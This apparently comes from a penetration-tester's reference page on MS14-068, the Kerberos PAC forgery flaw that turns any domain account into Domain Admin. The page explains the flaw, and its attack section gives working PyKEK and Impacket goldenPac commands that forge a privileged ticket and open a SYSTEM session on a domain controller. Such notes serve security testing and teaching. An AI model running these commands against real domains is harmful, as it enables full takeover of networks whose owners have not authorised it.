MS14-068 is the classic "any user to Domain Admin" Kerberos flaw. The PAC (Privilege Attribute Certificate) inside a Kerberos ticket carries the user's group memberships, and it is signed so the KDC can trust it. The flaw was that an unpatched domain controller mis-validated that signature, accepting a PAC signed with the wrong (even keyless) algorithm. So any authenticated user could take their own ticket, rewrite the PAC to claim membership of Domain Admins, attach a bogus-but-accepted signature, and the DC would honour it.
Why it mattered historically#
When it appeared in 2014 this was more dangerous than a golden ticket: a golden ticket needs the krbtgt key, whereas MS14-068 needs only a single valid domain account and its SID. It is the archetype of a KDC validation flaw, and it is the reason PAC validation and later PAC hardening (the signatures that forged tickets and Kerberos relay now have to contend with) exist. It is patched on any current DC, but still turns up on unpatched or long-lived legacy domain controllers, so it stays on the checklist.
The attack#
# PyKEK: forge a TGT with a PAC claiming privileged membership (needs the user's SID)
python ms14-068.py -u user@example.local -s <user-SID> -d <dc-ip> -p <password>
# -> produces a .ccache TGT; load it and use it
export KRB5CCNAME=TGT_user@example.local.ccache
# then psexec/secretsdump with -k -no-pass
# Impacket goldenPac: automate the forge and open a privileged session via PsExec
goldenPac.py example.local/user:password@<dc-fqdn>
Exploitation notes#
- The only inputs are a valid credential and the account's SID, both trivially obtained, which is what made this a one-shot domain takeover.
- The forged ticket is a normal-looking TGT, so once loaded it is used like any other pass-the-ticket material against SMB, LDAP, or the DC.
goldenPacchains the forge straight into code execution on the DC, so a single command goes from domain user to SYSTEM on a domain controller.- Against a patched DC the KDC rejects the forged PAC, so confirm the DC's patch level first; its value today is on legacy and unmaintained DCs.
Tools#
- PyKEK (
ms14-068.py): forge the TGT with a crafted PAC from a password or hash. - Impacket
goldenPac.py: automate the exploit and open a PsExec session on the DC.